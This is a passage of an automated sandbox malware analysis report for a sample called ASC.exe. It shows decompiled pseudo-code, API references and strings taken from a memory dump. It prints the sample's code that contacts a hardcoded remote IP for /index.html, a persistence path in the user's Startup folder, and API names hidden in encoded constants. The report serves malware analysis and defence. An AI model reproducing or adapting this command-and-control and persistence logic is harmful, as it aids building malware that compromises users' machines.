						_t245 =  *0x12e5968; // 0x0
						_t246 =  *((intOrPtr*)(_t245 + 0x1c))(_t244,  &_v28, L"/index.html", 0, 0,  &_v292, 0);
						 *0x12e59bc = _t246;
						if(_t246 == 0) {
							L19:
							_t247 =  *0x12e5968; // 0x0
							 *((intOrPtr*)(_t247 + 0x28))( *0x12e59c0);
							goto L3;
						}
						_t249 =  *0x12e5968; // 0x0
						 *((intOrPtr*)(_t249 + 0xc))(_t246, 0x2710, 0x2710, 0x927c0, 0x927c0);
						return _t387;
					}
					_push( &_v320);
					_t253 =  *0x12e5968; // 0x0
					if( *((intOrPtr*)(_t253 + 4))() == 0) {
						goto L20;
					}
					_t255 = _v312;
					if(_t255 != 0) {
						_v12 = _t255;
						_v16 = 3;
						_v8 = 0;
					}
					_t256 = _v316;
					if(_t256 != 0) {
						_v44 = _t256;
						_push( &_v304);
						_push( &_v52);
						_push( &_v836);
						_push( *0x12e59c0);
						_t275 =  *0x12e5968; // 0x0
						_v52 = 2;
						_v48 = 0;
						_v32 = _t387;
						_v40 = 0;
						_v36 = 0;
						if( *((intOrPtr*)(_t275 + 0x20))() != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t387 = 1;
						}
					}
					if(_v320 != 0) {
						_push( &_v304);
						_push( &_v52);
						_push( &_v836);
						_push( *0x12e59c0);
						_t270 =  *0x12e5968; // 0x0
						_v52 = _t387;
						_v48 = 3;
						_v32 = _t387;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						if( *((intOrPtr*)(_t270 + 0x20))() != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t387 = 1;
						}
					}
					if(_v12 == 0) {
						goto L20;
					} else {
						_t258 =  *0x12e5968; // 0x0
						 *((intOrPtr*)(_t258 + 8))( *0x12e59c0, 0x26,  &_v16, 0xc);
						_t380 = _a4;
						E012C10F7(0x20, "%S", _v12);
						_t261 = E012C1240(_a4, 0x3a);
						if(_t261 == 0) {
							 *_a8 = 0x1f90;
						} else {
							 *_t261 = 0;
							E012C207D(_t261 + 1, "%d", _a8);
						}
						if(E012CC8AE(_t380, _t380) != 0) {
							goto L22;
						} else {
							goto L19;
						}
					}
				}
				_t277 = E012C1195(_t336,  &_v320, "192.243.101.124", 0x34);
				_pop(_t335);
				 *0x12e5968 = _t277;
				if(_t277 == 0 || E012D5B62(_t335, _t277) == 0) {
					goto L3;
				} else {
					goto L4;
				}
			}

0x012cc931
0x012cc93f
0x012cc942
0x012cc946
0x012cc949
0x012cc950
0x012cc954
0x012cc958
0x012cc95b
0x012cc95f
0x012cc962
0x012cc966
0x012cc969
0x012cc96d
0x012cc971
0x012cc972
0x012cc978
0x012cc979
0x012cc984
0x012cc99b
0x012cc9a5
0x012cc9b7
0x012cc9c1
0x012cc9c2
0x012cc9c3
0x012cc9cc
0x012cc9cd
0x012cc9ce
0x012cc9d9
0x012cc9da
0x012cc9ff
0x012cca04
0x012cca0b
0x012cca19
0x012cca25
0x012cca2b
0x012cca34
0x012cca3b
0x012cca44
0x012cca4a
0x012cca51
0x012cca5a
0x012cca61
0x012cca67
0x012cca6e
0x012cca77
0x012cca7d
0x012cca84
0x012cca8d
0x012cca91
0x012cca9b
0x012ccaa5
0x012ccaac
0x012ccab0
0x012ccab4
0x012ccac0
0x012ccac7
0x012ccad6
0x012ccadd
0x012ccaea
0x012ccaf1
0x012ccafd
0x012ccb07
0x012ccb10
0x012ccb1a
0x012ccb23
0x012ccb2a
0x012ccb31
0x012ccb38
0x012ccb44
0x012ccb4b
0x012ccb54
0x012ccb60
0x012ccb69
0x012ccb73
0x012ccb7d
0x012ccb87
0x012ccb91
0x012ccb9b
0x012ccba5
0x012ccbaf
0x012ccbb8
0x012ccbc2
0x012ccbcc
0x012ccbd5
0x012ccbdf
0x012ccbe9
0x012ccbf3
0x012ccbfd
0x012ccc07
0x012ccc10
0x012ccc1a
0x012ccc24
0x012ccc2f
0x012ccc39
0x012ccc40
0x012ccc4c
0x012ccc55
0x012ccc5f
0x012ccc69
0x012ccc72
0x012ccc7c
0x012ccc85
0x012ccc8f
0x012ccc99
0x012ccca2
0x012cccac
0x012cccb6
0x012cccbd
0x012cccc7
0x012cccd3
0x012cccdd
0x012cccea
0x012cccf4
0x012cccfd
0x012ccd04
0x012ccd11
0x012ccd18
0x012ccd24
0x012ccd32
0x012ccd39
0x012ccd41
0x012ccd4b
0x012ccd55
0x012ccd5f
0x012ccd69
0x012ccd72
0x012ccd77
0x012ccd7a
0x012ccd81
0x012cced6
0x012cced9
0x012cceef
0x012cc9f8
0x00000000
0x012cc9f8
0x012ccf08
0x012ccf0f
0x012ccf1f
0x012ccf24
0x012ccf27
0x012ccf2e
0x00000000
0x00000000
0x012ccf36
0x012ccf39
0x012ccf3d
0x012ccf40
0x012ccf44
0x012ccf47
0x012ccf4b
0x012ccf4c
0x012ccf53
0x012ccf6a
0x012ccf6f
0x012ccf72
0x012ccf79
0x012ccec3
0x012ccec9
0x012ccece
0x00000000
0x012ccece
0x012ccf8e
0x012ccf93
0x00000000
0x012ccf96
0x012ccd8d
0x012ccd8e
0x012ccd98
0x00000000
0x00000000
0x012ccd9e
0x012ccda6
0x012ccda8
0x012ccdab
0x012ccdb2
0x012ccdb2
0x012ccdb5
0x012ccdbd
0x012ccdbf
0x012ccdc8
0x012ccdcc
0x012ccdd3
0x012ccdd4
0x012ccdda
0x012ccddf
0x012ccde6
0x012ccde9
0x012ccdec
0x012ccdef
0x012ccdf7
0x012cce02
0x012cce03
0x012cce04
0x012cce07
0x012cce07
0x012ccdf7
0x012cce0e
0x012cce16
0x012cce1a
0x012cce21
0x012cce22
0x012cce28
0x012cce2d
0x012cce30
0x012cce37
0x012cce3a
0x012cce3d
0x012cce40
0x012cce48
0x012cce53
0x012cce54
0x012cce55
0x012cce58
0x012cce58
0x012cce48
0x012cce5c
0x00000000
0x012cce5e
0x012cce64
0x012cce71
0x012cce77
0x012cce81
0x012cce8c
0x012cce95
0x012cceb0
0x012cce97
0x012cce9a
0x012ccea3
0x012ccea8
0x012ccec1
0x00000000
0x00000000
0x00000000
0x00000000
0x012ccec1
0x012cce5c
0x012cc9de
0x012cc9e3
0x012cc9e4
0x012cc9eb
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_swscanf.LIBCMT ref: 012CCEA3

Part of subcall function 012D5B62: GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 012D5C05
Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5C73
Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5C9E
Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5CCF
Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5D07

Strings

192.243.101.124, xrefs: 012CC97F, 012CC988, 012CC9AD, 012CCEE2
/index.html, xrefs: 012CCF60

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D92E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97

C-Code - Quality: 91%

			E012D92E0(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, char* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v32;
				intOrPtr _v44;
				char _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				signed int _t36;
				signed int _t39;
				void* _t42;
				char _t46;
				void* _t47;
				void* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				char* _t60;
				signed int _t61;

				_t58 = __edx;
				_t47 = __ebx;
				_t30 =  *0x12e2aa8; // 0x5ff9d198
				_v8 = _t30 ^ _t61;
				_t60 = _a8;
				_t59 = 0x16;
				E012D9AE7(__ebx,  &_v48, __edx, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t59);
				if(_t60 != 0) {
					_t52 = _a12;
					__eflags = _t52;
					if(_t52 == 0) {
						goto L1;
					} else {
						_push(_t47);
						_t49 = _v44 - 1;
						__eflags = _v48 - 0x2d;
						_t39 = 0 | _v48 == 0x0000002d;
						_t59 = _t39 + _t60;
						__eflags = _t52 - 0xffffffff;
						if(_t52 != 0xffffffff) {
							_t55 = _t52 - _t39;
							__eflags = _t55;
						} else {
							_t55 = _t52;
						}
						_t36 = E012D9981(_t59, _t55, _a16,  &_v48);
						__eflags = _t36;
						if(_t36 == 0) {
							_t42 = _v44 - 1;
							__eflags = _t49 - _t42;
							_t56 = _t55 & 0xffffff00 | _t49 - _t42 < 0x00000000;
							__eflags = _t42 - 0xfffffffc;
							if(_t42 < 0xfffffffc) {
								L14:
								_t36 = L012D8B5E(_t60, _a12, _a16, _a20,  &_v48, 1, _a24);
							} else {
								__eflags = _t42 - _a16;
								if(_t42 >= _a16) {
									goto L14;
								} else {
									__eflags = _t56;
									if(_t56 != 0) {
										do {
											_t46 =  *_t59;
											_t59 = _t59 + 1;
											__eflags = _t46;
										} while (_t46 != 0);
										 *((char*)(_t59 - 2)) = _t46;
									}
									_t36 = E012D911C( &_v48, _t60, _a12, _a16, 1, _a24);
								}
							}
						} else {
							 *_t60 = 0;
						}
						_pop(_t47);
					}
				} else {
					L1:
					 *(E012C22A2()) = _t59;
					E012C390C();
					_t36 = _t59;
				}
				return E012C8B82(_t36, _t47, _v8 ^ _t61, _t58, _t59, _t60);
			}

0x012d92e0
0x012d92e0
0x012d92e8
0x012d92ef
0x012d92f6
0x012d92fc
0x012d930b
0x012d9315
0x012d932a
0x012d932d
0x012d932f
0x00000000
0x012d9331
0x012d9331
0x012d9337
0x012d9338
0x012d933c
0x012d933f
0x012d9342
0x012d9345
0x012d934b
0x012d934b
0x012d9347
0x012d9347
0x012d9347
0x012d9356
0x012d935e
0x012d9360
0x012d936a
0x012d936b
0x012d936d
0x012d9370
0x012d9373
0x012d93a2
0x012d93b6
0x012d9375
0x012d9375
0x012d9378
0x00000000
0x012d937a
0x012d937a
0x012d937c
0x012d937e
0x012d937e
0x012d9380
0x012d9381
0x012d9381
0x012d9385
0x012d9385
0x012d9398
0x012d939d
0x012d9378
0x012d9362
0x012d9362
0x012d9362
0x012d93be
0x012d93be
0x012d9317
0x012d9317
0x012d931c
0x012d931e
0x012d9323
0x012d9323
0x012d93cc

APIs

Part of subcall function 012D8CBF: __fltout2.LIBCMT ref: 012D8CEE

__fltout2.LIBCMT ref: 012D930B

Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28

Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C

__cftof2_l.LIBCMT ref: 012D9398

Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D919A
Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D91BE

Strings

-, xrefs: 012D9338

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D8CBF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84

C-Code - Quality: 95%

			E012D8CBF(void* __eflags, intOrPtr* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v32;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t42;
				void* _t56;
				char* _t57;
				intOrPtr _t58;
				signed int _t59;

				_t26 =  *0x12e2aa8; // 0x5ff9d198
				_v8 = _t26 ^ _t59;
				_t58 = _a16;
				_t57 = _a8;
				_t42 = 0x16;
				E012D9AE7(_t42,  &_v48, _t56, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t42);
				if(_t57 != 0) {
					_t30 = _a12;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L1;
					}
					__eflags = _t30 - 0xffffffff;
					if(_t30 != 0xffffffff) {
						_v48 - 0x2d = _t58;
						_t36 = _t30 - (_v48 == 0x2d) - (_t58 > 0);
						__eflags = _t30 - (_v48 == 0x2d) - (_t58 > 0);
					} else {
						_t36 = _t30;
					}
					_v48 - 0x2d = _t58;
					_t33 = E012D9981((0 | _t58 > 0x00000000) + (0 | _v48 == 0x0000002d) + _t57, _t36, _t58 + 1,  &_v48);
					__eflags = _t33;
					if(_t33 == 0) {
						_t33 = L012D8B5E(_t57, _a12, _t58, _a20,  &_v48, 0, _a24);
					} else {
						 *_t57 = 0;
					}
					L9:
					return E012C8B82(_t33, _t42, _v8 ^ _t59, _t56, _t57, _t58);
				}
				L1:
				 *((intOrPtr*)(E012C22A2())) = _t42;
				E012C390C();
				_t33 = _t42;
				goto L9;
			}

0x012d8cc7
0x012d8cce
0x012d8cd6
0x012d8cda
0x012d8cdf
0x012d8cee
0x012d8cf8
0x012d8d0a
0x012d8d0d
0x012d8d0f
0x00000000
0x00000000
0x012d8d11
0x012d8d14
0x012d8d27
0x012d8d2c
0x012d8d2c
0x012d8d16
0x012d8d16
0x012d8d16
0x012d8d42
0x012d8d4c
0x012d8d54
0x012d8d56
0x012d8d6f
0x012d8d58
0x012d8d58
0x012d8d58
0x012d8d77
0x012d8d85
0x012d8d85
0x012d8cfa
0x012d8cff
0x012d8d01
0x012d8d06
0x00000000

APIs

__fltout2.LIBCMT ref: 012D8CEE

Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28

Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C

Strings

-, xrefs: 012D8D39
e+000, xrefs: 012D8C2B

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D921F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80

C-Code - Quality: 87%

			E012D921F(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, char* _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				char _v32;
				intOrPtr _v44;
				char _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				signed int _t23;
				signed int _t28;
				void* _t36;
				signed int _t37;
				char* _t49;
				signed int _t51;

				_t48 = __edx;
				_t36 = __ebx;
				_t20 =  *0x12e2aa8; // 0x5ff9d198
				_v8 = _t20 ^ _t51;
				_t49 = _a8;
				_t50 = 0x16;
				_t23 = E012D9AE7(__ebx,  &_v48, __edx, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t50);
				if(_t49 != 0) {
					_push(_t36);
					_t37 = _a12;
					__eflags = _t37;
					if(_t37 != 0) {
						_t24 = _t23 | 0xffffffff;
						__eflags = _t37 - _t24;
						if(_t37 != _t24) {
							__eflags = _v48 - 0x2d;
							_t24 = _t37 - (_v48 == 0x2d);
							__eflags = _t37 - (_v48 == 0x2d);
						}
						_t50 = _a16;
						__eflags = _v48 - 0x2d;
						_t28 = E012D9981((0 | _v48 == 0x0000002d) + _t49, _t24, _v44 + _a16,  &_v48);
						__eflags = _t28;
						if(_t28 == 0) {
							_t28 = E012D911C( &_v48, _t49, _t37, _t50, 0, _a20);
						} else {
							 *_t49 = 0;
						}
					} else {
						 *(E012C22A2()) = _t50;
						E012C390C();
						_t28 = _t50;
					}
					_pop(_t36);
				} else {
					 *(E012C22A2()) = _t50;
					E012C390C();
					_t28 = _t50;
				}
				return E012C8B82(_t28, _t36, _v8 ^ _t51, _t48, _t49, _t50);
			}

0x012d921f
0x012d921f
0x012d9227
0x012d922e
0x012d9236
0x012d923b
0x012d924a
0x012d9254
0x012d9266
0x012d9267
0x012d926a
0x012d926c
0x012d927e
0x012d9281
0x012d9283
0x012d9287
0x012d9290
0x012d9290
0x012d9290
0x012d9292
0x012d92a2
0x012d92ac
0x012d92b4
0x012d92b6
0x012d92c9
0x012d92b8
0x012d92b8
0x012d92b8
0x012d926e
0x012d9273
0x012d9275
0x012d927a
0x012d927a
0x012d92d1
0x012d9256
0x012d925b
0x012d925d
0x012d9262
0x012d9262
0x012d92df

APIs

__fltout2.LIBCMT ref: 012D924A

Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28

Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C

__cftof2_l.LIBCMT ref: 012D92C9

Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D919A
Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D91BE

Strings

-, xrefs: 012D92A2

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D0B07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
registry

C-Code - Quality: 58%

			E012D0B07(void* __eax, int* __ebx, void* __edx) {
				short* _t20;
				void* _t28;
				void* _t36;
				char* _t40;
				void* _t41;

				_t36 = __edx;
				if(__eax == 0) {
					 *(_t41 + 0x68) = __ebx;
					 *(_t41 + 0x70) = __ebx;
					_t20 = E012C1CB1(L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe", 0x5c);
					if(_t20 == __ebx) {
						L10:
						_push( *(_t41 + 0x6c));
						return E01315B15(_t20, _t41);
					}
					_t20 =  &(_t20[1]);
					 *(_t41 + 0x64) = _t20;
					if(_t20 == 0) {
						goto L10;
					}
					_t35 = _t41 + 0x68;
					if(_t20 != 0) {
						goto L10;
					}
					_push( *(_t41 + 0x70));
					_push(__ebx);
					_push(_t36);
					_t40 = E01345D12(_t20);
					if(RegQueryValueExW( *(_t41 + 0x6c),  *(_t41 + 0x64), __ebx, _t41 + 0x68, _t40, _t41 + 0x70) != 0 ||  *_t40 == 2) {
						_push(_t40);
						return E0133EFBF(_t26);
					} else {
						_t28 = E012C8BA0(_t40, __ebx,  *(_t41 + 0x70));
						 *_t40 = 2;
						_push( *(_t41 + 0x70));
						_push(_t40);
						_push( *(_t41 + 0x68));
						_push(__ebx);
						_push( *(_t41 + 0x64));
						_push( *(_t41 + 0x6c));
						return E0136B72C(_t28, _t35, _t41);
					}
				}
				return 0;
			}

0x012d0b07
0x012d0b09
0x012d0b16
0x012d0b19
0x012d0b1c
0x012d0b25
0x012d0b9a
0x012d0b9a
0x00000000
0x012d0b9d
0x012d0b28
0x012d0b29
0x012d0b2c
0x00000000
0x00000000
0x012d0b39
0x012d0b46
0x00000000
0x00000000
0x012d0b48
0x012d0b4b
0x012d0b4c
0x012d0b52
0x012d0b68
0x012d0b93
0x00000000
0x012d0b6f
0x012d0b74
0x012d0b7c
0x012d0b7f
0x012d0b82
0x012d0b83
0x012d0b86
0x012d0b87
0x012d0b8a
0x00000000
0x012d0b8d
0x012d0b68
0x012d0bac

APIs

RegQueryValueExW.ADVAPI32(?,00000002,?,?,?,?), ref: 012D0B42
RegQueryValueExW.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 012D0B64

Strings

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 012D0B11

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C7C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

C-Code - Quality: 85%

			E012C7C70(void* __ecx) {
				char* _v8;
				signed int _v12;
				char _v16;
				void* __edi;
				void* __esi;
				void* _t13;
				intOrPtr* _t15;
				signed int _t18;
				signed int _t19;
				void* _t26;
				char _t27;
				void* _t28;
				char* _t36;
				signed int _t37;
				intOrPtr _t41;

				_t26 = __ecx;
				_t41 =  *0x12e6b2c; // 0x1
				if(_t41 == 0) {
					_t13 = E012C2EFF(__ecx);
				}
				_push(0x104);
				_t36 = "C:\\Users\\angela\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ASC.exe";
				_push(_t36);
				_push(0);
				 *0x12e39fc = 0;
				_push(_t26);
				E0133291B(_t13, _t36, _t41);
				_t15 =  *0x12e6b34; // 0x3a36f8
				 *0x12e3270 = _t36;
				if(_t15 == 0) {
					L4:
					_v8 = _t36;
					goto L5;
				} else {
					_v8 = _t15;
					if( *_t15 != 0) {
						L5:
						E012C7AD6(_t26, _v8,  &_v16, 0, 0,  &_v12);
						_t18 = _v12;
						if(_t18 >= 0x3fffffff) {
							L10:
							_t19 = _t18 | 0xffffffff;
							__eflags = _t19;
							return _t19;
						}
						_t27 = _v16;
						if(_t27 >= 0xffffffff) {
							goto L10;
						}
						_t33 = _t18 << 2;
						_t18 = (_t18 << 2) + _t27;
						if(_t18 < _t27) {
							goto L10;
						}
						_t18 = E012C8F8E(_t18);
						_t37 = _t18;
						_pop(_t28);
						if(_t37 == 0) {
							goto L10;
						}
						E012C7AD6(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
						 *0x12e3254 = _v12 - 1;
						 *0x12e3258 = _t37;
						return 0;
					}
					goto L4;
				}
			}

0x012c7c70
0x012c7c7d
0x012c7c83
0x012c7c85
0x012c7c85
0x012c7c8a
0x012c7c8f
0x012c7c94
0x012c7c95
0x012c7c96
0x012c7c9c
0x012c7c9d
0x012c7ca2
0x012c7ca7
0x012c7caf
0x012c7cb8
0x012c7cb8
0x00000000
0x012c7cb1
0x012c7cb1
0x012c7cb6
0x012c7cbb
0x012c7cc7
0x012c7ccc
0x012c7cd7
0x012c7d23
0x012c7d23
0x012c7d23
0x00000000
0x012c7d23
0x012c7cd9
0x012c7cdf
0x00000000
0x00000000
0x012c7ce3
0x012c7ce6
0x012c7ceb
0x00000000
0x00000000
0x012c7cee
0x012c7cf3
0x012c7cf5
0x012c7cf8
0x00000000
0x00000000
0x012c7d08
0x012c7d14
0x012c7d19
0x00000000
0x012c7d1f
0x00000000
0x012c7cb6

APIs

_parse_cmdline.LIBCMT ref: 012C7CC7

Part of subcall function 012C8F8E: Sleep.KERNEL32(00000000,00000001,012C1398,?,012C83EF,00000018,012E0B60,0000000C,012C847F,012C1398,00000000,?,012C245F,00000008,012E0A70,00000020), ref: 012C8FAF

_parse_cmdline.LIBCMT ref: 012C7D08

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe, xrefs: 012C7C8F, 012C7C94

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CD22E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
library

C-Code - Quality: 61%

			E012CD22E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebp;
				signed int _t22;
				_Unknown_base(*)()* _t24;
				void* _t25;
				signed int _t28;
				void* _t31;
				struct HINSTANCE__* _t34;

				_t31 = __edx;
				_push( &_v28);
				_v28 = 0x67616d49;
				_v24 = 0x706c6865;
				_v20 = 0x6c6c642e;
				_v16 = 0;
				_v48 = 0x63656843;
				_v44 = 0x6d75536b;
				_v40 = 0x7070614d;
				_v36 = 0x69466465;
				_v32 = 0x656c;
				_v30 = 0;
				_t22 = E01366AD6( &_v28);
				_t34 = _t22;
				if(_t34 != 0) {
					_t12 =  &_v48; // 0x63656843
					_t24 = GetProcAddress(_t34, _t12);
					if(_t24 != 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_t25 =  *_t24(_a4, _a8,  &_v12,  &_v8);
						_push(_t34);
						return E013757F5(_t25, _t31, __edi);
					}
					_push(_t34);
					return E0133E3CC(_t24, __edi);
				}
				_t28 = _t22 | 0xffffffff;
				return _t28;
			}

0x012cd22e
0x012cd238
0x012cd239
0x012cd240
0x012cd247
0x012cd24e
0x012cd252
0x012cd259
0x012cd260
0x012cd267
0x012cd26e
0x012cd274
0x012cd279
0x012cd27e
0x012cd282
0x012cd289
0x012cd28e
0x012cd296
0x012cd2a1
0x012cd2a5
0x012cd2b7
0x012cd2b9
0x00000000
0x012cd2ba
0x012cd298
0x00000000
0x012cd299
0x012cd284
0x012cd2c5

APIs

GetProcAddress.KERNEL32(00000000,CheckSumMappedFileImagehlp.dll,?,?), ref: 012CD28E

Strings

.dll, xrefs: 012CD247
CheckSumMappedFileImagehlp.dll, xrefs: 012CD289, 012CD28C

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C2309, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17
library

C-Code - Quality: 82%

			E012C2309(void* __eax, intOrPtr _a4) {
				struct HINSTANCE__* _t3;

				_push(L"mscoree.dll");
				_t3 = E0131E896();
				if(_t3 != 0) {
					_t3 = GetProcAddress(_t3, "CorExitProcess");
					if(_t3 != 0) {
						return _t3->i(_a4);
					}
				}
				return _t3;
			}

0x012c230e
0x012c2314
0x012c231b
0x012c2323
0x012c232b
0x00000000
0x012c2330
0x012c232b
0x012c2333

APIs

GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,mscoree.dll,?,012C2341,012C1398,?,012C11C4,000000FF,0000001E,00000001,00000000,00000000,?,012C8F9F), ref: 012C2323

Strings

mscoree.dll, xrefs: 012C230E
CorExitProcess, xrefs: 012C231D

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

